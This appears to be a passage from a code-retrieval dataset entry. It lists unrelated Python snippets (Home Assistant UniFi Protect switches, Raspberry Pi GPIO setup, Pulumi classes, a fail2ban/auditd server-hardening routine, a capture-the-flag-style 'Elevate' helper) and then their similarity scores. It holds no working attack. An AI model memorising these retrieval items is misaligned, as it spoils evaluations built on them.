params)", "def setUp(self):\n self.frequency = 250\n self.firmware = 30474\n self.mask = lmdm.ListModeDataMask(self.frequency, self.firmware)", "def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)", "def __init__(self, _BurnProb=0.3):\n _snap.TUndirFFire_swiginit(self, _snap.new_TUndirFFire(_BurnProb))", "def __init__(self):\r\n self.activation = Activation(u'signup')\r\n self.activated = False", "def __init__(self, pin =0):\n\t\tself.uv_sensor = pin\n\t\tgrovepi.pinMode(self.uv_sensor, \"INPUT\")", "def __init__(self):\n _hypre.HypreILU_swiginit(self, _hypre.new_HypreILU())", "async def async_turn_off(self, **kwargs):\n if self._switch_type == \"ir_mode\":\n _LOGGER.debug(\"Turning off IR\")\n await self.upv.set_camera_ir(self._camera_id, self._ir_off_cmd)\n elif self._switch_type == \"status_light\":\n _LOGGER.debug(\"Changing Status Light to Off\")\n await self.upv.set_camera_status_light(self._camera_id, False)\n elif self._switch_type == \"hdr_mode\":\n _LOGGER.debug(\"Turning off HDR mode\")\n await self.upv.set_camera_hdr_mode(self._camera_id, False)\n elif self._switch_type == \"high_fps\":\n _LOGGER.debug(\"Turning off High FPS mode\")\n await self.upv.set_camera_video_mode_highfps(self._camera_id, False)\n else:\n _LOGGER.debug(\"Turning off Recording\")\n await self.upv.set_camera_recording(self._camera_id, TYPE_RECORD_NEVER)\n await self.protect_data.async_refresh(force_camera_update=True)", "def _use_existing_configuration(self):\n HW_Init(self.ftdi, None)", "def setUp(self):\n self.portal = self.layer['portal']\n self.installer = get_installer(self.portal)", "def setup(self):\n \n # Board refers to the P1 header of the Raspberry Pi board\n GPIO.setmode(GPIO.BOARD)\n\n # Set up pin as an input with a pull up resistor to 3.3V\n GPIO.setup(self.__pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n if not protect_data.data:\n return\n\n sensors = []\n for sensor in SENSOR_TYPES:\n for camera in protect_data.data:\n sensors.append(UnifiProtectSensor(upv_object, protect_data, camera, sensor))\n _LOGGER.debug(\"UNIFIPROTECT SENSOR CREATED: %s\", sensor)\n\n async_add_entities(sensors)\n\n return True", "def t0_switch_config_helper(test_obj: 'T0TestBase'):\n configer = SwitchConfiger(test_obj)\n test_obj.dut.switch_id = configer.start_switch()", "def do_security_setup(run_as_user, branch, base_path, dist_path, enable=True):\n \n if not enable:\n #disable security setup if enabled\n runcmd(\"apt-get -y remove unattended-upgrades fail2ban psad rkhunter chkrootkit logwatch apparmor auditd iwatch\")\n return\n \n #modify host.conf\n modify_config(r'^nospoof on$', 'nospoof on', '/etc/host.conf')\n \n #enable automatic security updates\n runcmd(\"apt-get -y install unattended-upgrades\")\n runcmd('''bash -c \"echo -e 'APT::Periodic::Update-Package-Lists \"1\";\\nAPT::Periodic::Unattended-Upgrade \"1\";' > /etc/apt/apt.conf.d/20auto-upgrades\" ''')\n runcmd(\"dpkg-reconfigure -fnoninteractive -plow unattended-upgrades\")\n \n 
#sysctl\n runcmd(\"install -m 0644 -o root -g root -D %s/linux/other/sysctl_rules.conf /etc/sysctl.d/60-tweaks.conf\" % dist_path)\n\n #set up fail2ban\n runcmd(\"apt-get -y install fail2ban\")\n runcmd(\"install -m 0644 -o root -g root -D %s/linux/other/fail2ban.jail.conf /etc/fail2ban/jail.d/counterblock.conf\" % dist_path)\n runcmd(\"service fail2ban restart\")\n \n #set up psad\n runcmd(\"apt-get -y install psad\")\n modify_config(r'^ENABLE_AUTO_IDS\\s+?N;$', 'ENABLE_AUTO_IDS\\tY;', '/etc/psad/psad.conf')\n modify_config(r'^ENABLE_AUTO_IDS_EMAILS\\s+?Y;$', 'ENABLE_AUTO_IDS_EMAILS\\tN;', '/etc/psad/psad.conf')\n for f in ['/etc/ufw/before.rules', '/etc/ufw/before6.rules']:\n modify_config(r'^# End required lines.*?# allow all on loopback$',\n '# End required lines\\n\\n#CUSTOM: for psad\\n-A INPUT -j LOG\\n-A FORWARD -j LOG\\n\\n# allow all on loopback',\n f, dotall=True)\n runcmd(\"psad -R && psad --sig-update\")\n runcmd(\"service ufw restart\")\n runcmd(\"service psad restart\")\n \n #set up chkrootkit, rkhunter\n runcmd(\"apt-get -y install rkhunter chkrootkit\")\n runcmd('bash -c \"rkhunter --update; exit 0\"')\n runcmd(\"rkhunter --propupd\")\n runcmd('bash -c \"rkhunter --check --sk; exit 0\"')\n runcmd(\"rkhunter --propupd\")\n \n #logwatch\n runcmd(\"apt-get -y install logwatch libdate-manip-perl\")\n \n #apparmor\n runcmd(\"apt-get -y install apparmor apparmor-profiles\")\n \n #auditd\n #note that auditd will need a reboot to fully apply the rules, due to it operating in \"immutable mode\" by default\n runcmd(\"apt-get -y install auditd audispd-plugins\")\n runcmd(\"install -m 0640 -o root -g root -D %s/linux/other/audit.rules /etc/audit/rules.d/counterblock.rules\" % dist_path)\n modify_config(r'^USE_AUGENRULES=.*?$', 'USE_AUGENRULES=\"yes\"', '/etc/default/auditd')\n runcmd(\"service auditd restart\")\n\n #iwatch\n runcmd(\"apt-get -y install iwatch\")\n modify_config(r'^START_DAEMON=.*?$', 'START_DAEMON=true', '/etc/default/iwatch')\n runcmd(\"install -m 0644 -o root -g root -D %s/linux/other/iwatch.xml /etc/iwatch/iwatch.xml\" % dist_path)\n modify_config(r'guard email=\"root@localhost\"', 'guard email=\"noreply@%s\"' % socket.gethostname(), '/etc/iwatch/iwatch.xml')\n runcmd(\"service iwatch restart\")", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n self._attr_name = f\"{self.device.display_name} {self.entity_description.name}\"\n self._switch_type = self.entity_description.key", "def __init__(self, arest, resource, name, pin):\n self.arest = arest\n self._resource = resource\n self._name = name\n self._pin = pin\n self.update()\n\n if self._pin is not None:\n request = requests.get('{}/mode/{}/i'.format\n (self._resource, self._pin), timeout=10)\n if request.status_code is not 200:\n _LOGGER.error(\"Can't set mode. 
Is device offline?\")", "def setup(self):\n self.scp = None", "def __init__(self, id: Union[int, str], /, mode: int = Pin.IN, pull: int = Pin.PULL_UP, af: Union[str, int] = -1, invert: bool = False):", "def setup_pin(self, pin, dutycycle, frequency=2000):\n raise NotImplementedError", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "async def async_turn_off(self, **kwargs: Any) -> None:\n\n await self.entity_description.ufp_set(self.device, False)", "def SPIsetup(self):\n self.writecmd(0x01,0x10,0,self.data); #SPI/SETUP", "def __init__(self, dev):\n self.dev = dev\n self.dev.cla = 0x80", "def SetAutoDetectUi(Ui):\n SPI.DeviceList[\"spi_rpi_ui\"]= Ui \n I2C.DeviceList[\"i2c_rpi_ui\"]= Ui", "def __init__(__self__, *,\n auth: Optional[pulumi.Input['IstioConfigAuth']] = None,\n disabled: Optional[pulumi.Input[bool]] = None):\n if auth is not None:\n pulumi.set(__self__, \"auth\", auth)\n if disabled is not None:\n pulumi.set(__self__, \"disabled\", disabled)", "def setup(self):\n\n self._enable_torque(self._reg.TORQUE_ENABLE)\n self.change_operating_mode(self._reg.MODE_EXT_POSI)\n # set to max velocity\n self.change_veloity(self._default_velocity)", "def firewallOff():\n pass", "def __init__(self, pin_obj: Pin, invert: bool = False):", "def setup(self):\n # if not system.restore_snapshot():\n # self.log.debug(\"No snapshot to restore, if this is not expected please contact automation team\")\n crindsim.set_mode(\"manual\")\n pos.connect()\n pos.sign_on()", "def __init__(self, bus: object):\r\n\r\n self.state_NF = False\r\n self.state_NT = False\r\n self.state_VE4_open = False\r\n self.state_VE4_close = False\r\n self.state_comand_open_VE4 = False\r\n self.state_comand_close_VE4 = False\r\n self.state_throttling = False\r\n self.state_heat = False\r\n self.state_rotation = False\r\n self.state_chmb_open = False\r\n self.back_door_close = False\r\n self.phase_electric = False\r\n self.turbine_break = False\r\n\r\n self.mes_current = 0\r\n self.mes_speed = 0\r\n self.mes_temperature = 0\r\n\r\n self.seted_throttling = 0\r\n self.seted_cur_heat = 0\r\n self.seted_rot_speed = 0\r\n\r\n self.bus = bus\r\n self.msg_send_upr = can.Message(\r\n arbitration_id=self.id_blockRasp_command,\r\n is_extended_id=True,\r\n dlc=4,\r\n data=bytearray(4),\r\n )", "def boot(self):\n\n pass", "def startup( self ):\n # ---- Setup UPNPC ----\n if self.config.neuron.use_upnpc:\n bittensor.logging.success(prefix = 'Set upnpc', sufix = '<green>ON</green>')\n try:\n self.external_port = net.upnpc_create_port_map( port = self.axon.port )\n except net.UPNPCException as upnpc_exception:\n logger.critical('Failed to hole-punch with upnpc')\n raise RuntimeError('Failed to hole-punch with upnpc')\n else:\n bittensor.logging.success(prefix = 'Set upnpc', sufix = '<red>OFF</red>')\n self.external_port = self.config.axon.port\n\n # ---- Get external ip ----\n try:\n self.external_ip = net.get_external_ip()\n bittensor.logging.success(prefix = 'External IP', sufix = '<blue>{}</blue>'.format(self.external_ip))\n except net.ExternalIPNotFound as external_port_exception:\n raise RuntimeError('Unable to attain your external ip. Check your internet connection. 
error:{}', external_port_exception)\n\n # ---- Setup tensorboard ----\n if self.config.neuron.use_tensorboard == True:\n self._tensorboard_program = program.TensorBoard()\n self._tensorboard_program.configure(argv=[None, '--logdir', self.config.neuron.full_path, '--load_fast=true'])\n self._tensorbaord_url = self._tensorboard_program.launch()\n bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<blue>http://localhost:6006/</blue>')\n else: bittensor.logging.success(prefix = 'Set tensorboard', sufix = '<red>OFF</red>')\n\n # ---- Setup Wallet. ----\n if not self.wallet.has_coldkeypub:\n self.wallet.create_new_coldkey( n_words = 12, use_password = True )\n if not self.wallet.has_coldkeypub:\n raise RuntimeError('Miner must have access to a decrypted coldkeypub')\n if not self.wallet.has_hotkey:\n self.wallet.create_new_hotkey( n_words = 12, use_password = False )\n if not self.wallet.has_hotkey:\n raise RuntimeError('Miner must have access to a decrypted hotkey')\n\n # ---- Subscribe to chain ----\n subscribe_success = self.subtensor.subscribe(\n wallet = self.wallet,\n ip = self.external_ip,\n port = self.external_port,\n modality = bittensor.proto.Modality.TEXT,\n wait_for_finalization = True,\n timeout = 4 * bittensor.__blocktime__,\n )\n if not subscribe_success:\n raise RuntimeError('Failed to subscribe neuron.')\n\n # ---- Starting axon ----\n self.axon.start()", "def __init__(self):\n GPIO.setmode(GPIO.BOARD) # Set's GPIO referencing to RPi Board Refdes\n self.chanlist = [29, 31, 33, 35, 37] # chanlist 0, 1, 2, 3, 4\n GPIO.setup(29, GPIO.IN) # Setup as input to pi\n GPIO.setup(31, GPIO.IN) # Setup as input\n GPIO.setup(33, GPIO.IN) # Setup as input\n GPIO.setup(35, GPIO.IN) # Setup as input\n GPIO.setup(37, GPIO.OUT) # Setup as output from pi\n self.SHTDWN = False\n\n GPIO.add_event_detect(self.chanlist[1], GPIO.BOTH) \n GPIO.add_event_detect(self.chanlist[3], GPIO.FALLING, self.callback_SHTDWN, bouncetime=200)", "def turn_aux_heat_on(self):\n self._device.set_mode(self._device.MODE_HEAT_EMERGENCY)\n self._device.set_fan(self._device.FAN_AUTO)", "def turn_off(self, **kwargs):\n _LOGGER.error(\"DALI TURN OFF\")\n self._state = False\n\n url = self.urlx + '/toggle'\n headers = {'x-ha-access': 'raspberry',\n 'content-type': 'application/json'}\n\n response = get(url, headers=headers)\n _LOGGER.error(response.text)\n\n json_data = json.loads(response.text)\n _LOGGER.error(json_data)\n\n state = json_data['state']\n\n self._dimmer = 0\n\n self._state = state == 'on'", "def bootup(debug_port, lines):\n lines.skip_until(\"Booting...\")\n lines.skip_until(\"Loading blocks...\")\n lines.skip_until(\"Starting user space\")\n authenticate(debug_port, lines)\n lines.expect_next(\"Enter command\")", "async def unlight(self) -> None:\n self.lit = False\n await self.run_command(\"miner fault_light off\")\n print(\"unlight\" + self.ip)", "def _force_off(self):\n self._interface.set('fw_wp_vref', self._fw_wp_vref)\n self._interface.set('fw_wp_en', 'on')\n self._interface.set('fw_wp', 'off')", "def turn_off(self, **kwargs: Any) -> None:\n if (\n DPCODE_LIGHT in self.tuya_device.status\n and DPCODE_SWITCH not in self.tuya_device.status\n ):\n commands = [{\"code\": DPCODE_LIGHT, \"value\": False}]\n else:\n commands = [{\"code\": DPCODE_SWITCH, \"value\": False}]\n self._send_command(commands)", "def _on_switch_activate(\n self, entity: Union[str, dict], attribute: str, old: str, new: str, kwargs: dict\n ) -> None:\n self.log(\"No one home; not allowing switch to activate\")\n\n 
self.toggle(state=\"off\")", "def Elevate(self):\n self.Send(self.EncryptString('elevate\\n'))\n print self.DecryptString(self.Recv(4096))\n\n self.Send(self.EncryptString(self.flag_2))\n print self.DecryptString(self.Recv(4096))\n\n self.Send(self.EncryptString('RocketDonkey\\n'))\n print self.DecryptString(self.Recv(4096))", "def affection_status_switch_on(self):\n self._affection_status_switch = False", "def __init__(self, hdw=['Soundcard'], devicename='dev1'):\n self.debugFlag = False\n self.task = None # NI Task\n self.required_hardware = hdw # Require specific hardware \n self.hardware = [] # list of hardware actually found on this system\n self.find_hardware(device_info={'devicename': devicename}) # population the self.hardware list", "def __init__(self):\n self.cad = pifacecad.PiFaceCAD()\n self.listener = pifacecad.SwitchEventListener(chip=self.cad)\n for i in range(8):\n self.listener.register(i, pifacecad.IODIR_FALLING_EDGE, self.press_key)\n self.listener.activate()\n atexit.register(self.atexit)", "def unconfigure_enable_password(device,secret=True,privilege=None):\n cmd=\"no enable\"\n if secret :\n cmd+=\" secret\"\n else :\n cmd+=\" password\"\n if privilege :\n cmd+=f\" level {privilege}\"\n\n try:\n device.configure(cmd)\n except SubCommandFailure as e:\n raise SubCommandFailure(\n f'Could not unconfigure enable password or secret:\\n{e}'\n )", "def test_lswitch_uninstall(self):\n self._common_uninstall_delete(\n 'id', lswitch.delete,\n {'switch': {}},\n ['logicalSwitch'], {\n 'uri_parameters': {'virtualWireID': 'id'}\n },\n additional_params=['vsphere_network_id']\n )", "def _init_io(self):\n GPIO.setwarnings(False)\n GPIO.setmode( GPIO.BCM )\n pins = [ self._spi_dc ]\n for pin in pins:\n GPIO.setup( pin, GPIO.OUT )", "def __init__(self):\n i2c.Pn532_i2c.__init__(self)\n self._uid = False", "def setUp(self):\n self.platform = wirelesstagpy.WirelessTags(username=USERNAME, password=PASSWORD)\n self.tag_outdoor = wirelesstagpy.SensorTag(MOCK.OUTDOOR_PROBE, self.platform)\n self.platform._tags[\"fake-1\"] = self.tag_outdoor # pylint: disable=protected-access", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def controlUp(*args):", "def __init__(self,address,InUseBy=None,Bus = None,Ident=''):\n self.Ident = Ident\n self.InUseBy = InUseBy\n VersionStrip =Ident.split(' ')[0].lower()\n if Ident !='' and VersionStrip in SPI.DeviceList:\n self.InUseBy = SPI.DeviceList[VersionStrip](Bus,address)\n else:\n self.Type=None\n if self.InUseBy!=None:\n self.Ident=VersionStrip", "async def test_setup_multiple(\n hass: HomeAssistant,\n ufp: MockUFPFixture,\n bootstrap: Bootstrap,\n) -> None:\n\n await hass.config_entries.async_setup(ufp.entry.entry_id)\n await hass.async_block_till_done()\n\n assert ufp.entry.state == ConfigEntryState.LOADED\n assert ufp.api.update.called\n assert ufp.entry.unique_id == ufp.api.bootstrap.nvr.mac\n\n nvr = bootstrap.nvr\n nvr._api = ufp.api\n nvr.mac = \"A1E00C826983\"\n nvr.id\n ufp.api.get_nvr = AsyncMock(return_value=nvr)\n\n with patch(\n \"homeassistant.components.unifiprotect.utils.ProtectApiClient\"\n ) as mock_api:\n mock_config = MockConfigEntry(\n domain=DOMAIN,\n data={\n \"host\": \"1.1.1.1\",\n \"username\": \"test-username\",\n \"password\": \"test-password\",\n \"id\": \"UnifiProtect\",\n \"port\": 443,\n \"verify_ssl\": False,\n },\n 
version=2,\n )\n mock_config.add_to_hass(hass)\n\n mock_api.return_value = ufp.api\n\n await hass.config_entries.async_setup(mock_config.entry_id)\n await hass.async_block_till_done()\n\n assert mock_config.state == ConfigEntryState.LOADED\n assert ufp.api.update.called\n assert mock_config.unique_id == ufp.api.bootstrap.nvr.mac", "def configure_switch(self, config):\n raise NotImplementedError" ]
[ "0.681985", "0.6236986", "0.60262203", "0.5953998", "0.574082", "0.5638578", "0.55229837", "0.5518489", "0.54835725", "0.53193676", "0.5306003", "0.529105", "0.5281412", "0.5253174", "0.5229308", "0.5203549", "0.5202759", "0.5167008", "0.51573527", "0.5147676", "0.5139711", "0.513108", "0.50843513", "0.5074334", "0.5072397", "0.50535524", "0.5033775", "0.5024384", "0.50232697", "0.501238", "0.5008296", "0.49974683", "0.49968866", "0.49935144", "0.49925593", "0.49886662", "0.49865025", "0.4980608", "0.49697623", "0.4962449", "0.49572477", "0.49549457", "0.49361503", "0.49301746", "0.49281558", "0.4925834", "0.49021757", "0.48983914", "0.48780498", "0.4874267", "0.48696592", "0.4869301", "0.48555192", "0.48451394", "0.48408186", "0.48190427", "0.48184213", "0.48184213", "0.48133814", "0.48059958", "0.47910488", "0.47904304", "0.47895175", "0.4787378", "0.47865155", "0.47861037", "0.47818443", "0.47812495", "0.47763056", "0.477412", "0.47634065", "0.47627178", "0.4762613", "0.47625306", "0.47568935", "0.47483024", "0.47432733", "0.4740015", "0.47377184", "0.47291654", "0.47278363", "0.47247654", "0.47214818", "0.47169715", "0.47164887", "0.4715152", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47062826", "0.47049633", "0.47046044", "0.46967322" ]
0.5260423
13
Initialize an Unifi Protect Switch.
def __init__(self, coordinator, upv, camera, switch_type, ir_on, ir_off): self.coordinator = coordinator self.upv = upv self._camera_id = camera self._camera = self.coordinator.data[camera] self._name = "{0} {1} {2}".format( DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera["name"] ) self._unique_id = self._name.lower().replace(" ", "_") self._icon = "mdi:{}".format(SWITCH_TYPES.get(switch_type)[1]) self._ir_on_cmd = ir_on self._ir_off_cmd = ir_off self._camera_type = self._camera["type"] self._attr = SWITCH_TYPES.get(switch_type)[2] self._switch_type = SWITCH_TYPES.get(switch_type)[2] _LOGGER.debug("UnifiProtectSwitch: %s created", self._name) _LOGGER.debug( "UnifiProtectSwitch: IR_ON %s IR_OFF %s", self._ir_on_cmd, self._ir_off_cmd )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, data, camera, switch_type):\n self.data = data\n self._camera_id = camera\n self._camera = self.data.devices[camera]\n self._name = \"{0} {1} {2}\".format(DOMAIN.capitalize(), SWITCH_TYPES[switch_type][0], self._camera[\"name\"])\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._icon = \"mdi:{}\".format(SWITCH_TYPES.get(switch_type)[1])\n self._state = STATE_OFF\n self._camera_type = self._camera[\"type\"]\n self._attr = SWITCH_TYPES.get(switch_type)[2]\n _LOGGER.debug(\"UnifiProtectSwitch: %s created\", self._name)", "def __init__(\n self, upv_object, protect_data, server_info, camera_id, switch, ir_on, ir_off\n ):\n super().__init__(upv_object, protect_data, server_info, camera_id, switch)\n self.upv = upv_object\n switch_type = SWITCH_TYPES[switch]\n self._name = f\"{switch_type[_SWITCH_NAME]} {self._camera_data['name']}\"\n self._icon = f\"mdi:{switch_type[_SWITCH_ICON]}\"\n self._ir_on_cmd = ir_on\n self._ir_off_cmd = ir_off\n self._switch_type = switch_type[_SWITCH_TYPE]", "def init(self):\n self.connect_to_switches()\n self.reset_states()", "def __init__(self, name, device, sensor_type, nvrdata):\n self._name = name\n self._unique_id = self._name.lower().replace(\" \", \"_\")\n self._device = device\n self._sensor_type = sensor_type\n self._nvrdata = nvrdata\n self._icon = \"mdi:{}\".format(SENSOR_TYPES.get(self._sensor_type)[2])\n self._state = device[\"recording_mode\"]\n self._camera_type = device[\"type\"]\n self._attr = SENSOR_TYPES.get(self._sensor_type)[3]\n _LOGGER.debug(\"UnifiProtectSensor: %s created\", self._name)", "def __init__(self):\n _hypre.HypreILU_swiginit(self, _hypre.new_HypreILU())", "def __init__(self):\n\n GPIO.setup(PIN_BTN, GPIO.IN, GPIO.PUD_UP)\n GPIO.setup(PIN_RED_LED_0, GPIO.OUT, GPIO.LOW)\n GPIO.setup(PIN_BLUE_LED, GPIO.OUT, GPIO.LOW)", "def __init__(self):\n GPIO.setwarnings(False)\n GPIO.cleanup() # Reset the high and low levels of the GPIO port\n #The following code defines the GPIO used to control the L298N chip. This definition is different for different Raspberry Pi driver boards.\n self.Motor_A_EN = 17\n self.Motor_B_EN = 4\n self.Motor_A_Pin1 = 27\n self.Motor_A_Pin2 = 18\n self.Motor_B_Pin1 = 21\n self.Motor_B_Pin2 = 26\n self.setup()", "def __init__(self, pin =0):\n\t\tself.uv_sensor = pin\n\t\tgrovepi.pinMode(self.uv_sensor, \"INPUT\")", "def __init__(self):\n i2c.Pn532_i2c.__init__(self)\n self._uid = False", "def __init__(self, arest, resource, name, pin):\n self.arest = arest\n self._resource = resource\n self._name = name\n self._pin = pin\n self.update()\n\n if self._pin is not None:\n request = requests.get('{}/mode/{}/i'.format\n (self._resource, self._pin), timeout=10)\n if request.status_code is not 200:\n _LOGGER.error(\"Can't set mode. 
Is device offline?\")", "def initialize_heating_pin(pi, pin):\n pi.set_pull_up_down(pin, pigpio.PUD_DOWN)", "def __init__(self, _BurnProb=0.3):\n _snap.TUndirFFire_swiginit(self, _snap.new_TUndirFFire(_BurnProb))", "def __init__(__self__, *,\n enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,\n enable_secure_boot: Optional[pulumi.Input[bool]] = None):\n if enable_integrity_monitoring is not None:\n pulumi.set(__self__, \"enable_integrity_monitoring\", enable_integrity_monitoring)\n if enable_secure_boot is not None:\n pulumi.set(__self__, \"enable_secure_boot\", enable_secure_boot)", "def __init__(self):\n self.cad = pifacecad.PiFaceCAD()\n self.listener = pifacecad.SwitchEventListener(chip=self.cad)\n for i in range(8):\n self.listener.register(i, pifacecad.IODIR_FALLING_EDGE, self.press_key)\n self.listener.activate()\n atexit.register(self.atexit)", "def __init__(self, dev):\n self.dev = dev\n self.dev.cla = 0x80", "def __init__(self, pin_obj: Pin, invert: bool = False):", "def __init__(self, id: Union[int, str], /, mode: int = Pin.IN, pull: int = Pin.PULL_UP, af: Union[str, int] = -1, invert: bool = False):", "def __init__(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin,GPIO.OUT)", "def __init__(__self__, *,\n auth: Optional[pulumi.Input['IstioConfigAuth']] = None,\n disabled: Optional[pulumi.Input[bool]] = None):\n if auth is not None:\n pulumi.set(__self__, \"auth\", auth)\n if disabled is not None:\n pulumi.set(__self__, \"disabled\", disabled)", "def __init__(self, input_pin: int) -> None:\n # Instansieer de afstand sensor pin.\n self._afstandsensor_input_pin = input_pin\n GPIO.setup(self._afstandsensor_input_pin, GPIO.IN,\n pull_up_down=GPIO.PUD_UP)\n\n # Zet fake opgepakt op false.\n self._fake_opgepakt = False", "def __init__(self, mb_info, switch_config):\n self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM)\n self.iop_switch_config = switch_config", "def init(self):\n self.reset()\n\n self.__interface.send_command('POWER_SETTING')\n self.__interface.send_data(0x37)\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('PANEL_SETTING')\n self.__interface.send_data(0xCF)\n self.__interface.send_data(0x08)\n\n self.__interface.send_command('BOOSTER_SOFT_START')\n self.__interface.send_data(0xc7)\n self.__interface.send_data(0xcc)\n self.__interface.send_data(0x28)\n\n self.__interface.send_command('POWER_ON')\n self.wait_until_idle()\n\n self.__interface.send_command('PLL_CONTROL')\n self.__interface.send_data(0x3c)\n\n self.__interface.send_command('TEMPERATURE_CALIBRATION')\n self.__interface.send_data(0x00)\n\n self.__interface.send_command('VCOM_AND_DATA_INTERVAL_SETTING')\n self.__interface.send_data(0x77)\n\n self.__interface.send_command('TCON_SETTING')\n self.__interface.send_data(0x22)\n\n self.__interface.send_command('TCON_RESOLUTION')\n self.__interface.send_data(0x02) #source 640\n self.__interface.send_data(0x80)\n self.__interface.send_data(0x01) #gate 384\n self.__interface.send_data(0x80)\n\n self.__interface.send_command('VCM_DC_SETTING')\n self.__interface.send_data(0x1E) #decide by LUT file\n\n self.__interface.send_command(0xe5, False) #FLASH MODE\n self.__interface.send_data(0x03)", "def __init__(self, device_label):\n self._device_label = device_label\n self._state = None\n self._digits = hub.config.get(CONF_CODE_DIGITS)\n self._changed_by = None\n self._change_timestamp = 0\n self._default_lock_code = hub.config.get(CONF_DEFAULT_LOCK_CODE)", "def __init__(self, user, server, port=80, model='motorized'):\n import 
pigpio\n self.user = user\n self.server, self.port = server, port\n self.model = model\n self.serial = self.get_serial()\n self.lock_id = self.get_lock_id()\n self.pi = pigpio.pi()\n self.avail_actions = {\n 'unlock': 600,\n 'lock': 2400,\n }", "def __init__(\n self,\n switch_type: str,\n switch_name: str,\n tm_client: TransmissionClient,\n client_name: str,\n ) -> None:\n self._attr_name = switch_name\n self.type = switch_type\n self._tm_client = tm_client\n self._state = STATE_OFF\n self._data = None\n self.unsub_update: Callable[[], None] | None = None\n self._attr_unique_id = f\"{tm_client.config_entry.entry_id}-{switch_type}\"\n self._attr_device_info = DeviceInfo(\n entry_type=DeviceEntryType.SERVICE,\n identifiers={(DOMAIN, tm_client.config_entry.entry_id)},\n manufacturer=\"Transmission\",\n name=client_name,\n )", "def _init_hardware(self):\n return", "def __init__(self):\n GPIO.setmode(GPIO.BOARD) # Set's GPIO referencing to RPi Board Refdes\n self.chanlist = [29, 31, 33, 35, 37] # chanlist 0, 1, 2, 3, 4\n GPIO.setup(29, GPIO.IN) # Setup as input to pi\n GPIO.setup(31, GPIO.IN) # Setup as input\n GPIO.setup(33, GPIO.IN) # Setup as input\n GPIO.setup(35, GPIO.IN) # Setup as input\n GPIO.setup(37, GPIO.OUT) # Setup as output from pi\n self.SHTDWN = False\n\n GPIO.add_event_detect(self.chanlist[1], GPIO.BOTH) \n GPIO.add_event_detect(self.chanlist[3], GPIO.FALLING, self.callback_SHTDWN, bouncetime=200)", "def __init__(self,address,InUseBy=None,Bus = None,Ident=''):\n self.Ident = Ident\n self.InUseBy = InUseBy\n VersionStrip =Ident.split(' ')[0].lower()\n if Ident !='' and VersionStrip in SPI.DeviceList:\n self.InUseBy = SPI.DeviceList[VersionStrip](Bus,address)\n else:\n self.Type=None\n if self.InUseBy!=None:\n self.Ident=VersionStrip", "def init(self):\n self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.IL_MOTOR_ID)\n self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.IR_MOTOR_ID)\n self.l_motor.initialize(\n inverted=False, encoder=False, phase=False, name=\"Intake Left\")\n self.r_motor.initialize(\n inverted=True, encoder=False, phase=False, name=\"Intake Right\")", "def __init__(self):\n self.server_name = 'Binary Light Device'\n self.device = None", "def __init__(self):\r\n self.activation = Activation(u'signup')\r\n self.activated = False", "def __init__(self, *args):\n _snap.TUIntHI_swiginit(self, _snap.new_TUIntHI(*args))", "def __init__(self):\n try: \n self.i2c = busio.I2C(board.SCL, board.SDA)\n self.mpu = adafruit_mpu6050.MPU6050(self.i2c)\n \n except: \n print(\"No IMU connection\")", "def init_switches(inds):\n for i in inds:\n GPIO.setup(i, GPIO.OUT, initial=0)", "def __init__(self, bus: object):\r\n\r\n self.state_NF = False\r\n self.state_NT = False\r\n self.state_VE4_open = False\r\n self.state_VE4_close = False\r\n self.state_comand_open_VE4 = False\r\n self.state_comand_close_VE4 = False\r\n self.state_throttling = False\r\n self.state_heat = False\r\n self.state_rotation = False\r\n self.state_chmb_open = False\r\n self.back_door_close = False\r\n self.phase_electric = False\r\n self.turbine_break = False\r\n\r\n self.mes_current = 0\r\n self.mes_speed = 0\r\n self.mes_temperature = 0\r\n\r\n self.seted_throttling = 0\r\n self.seted_cur_heat = 0\r\n self.seted_rot_speed = 0\r\n\r\n self.bus = bus\r\n self.msg_send_upr = can.Message(\r\n arbitration_id=self.id_blockRasp_command,\r\n is_extended_id=True,\r\n dlc=4,\r\n data=bytearray(4),\r\n )", "def initialize(self):\n\t\tpcd8544.LCD.initialize(self)\n\t\tRPIO.setup(self._backlight_pin, RPIO.OUT, 
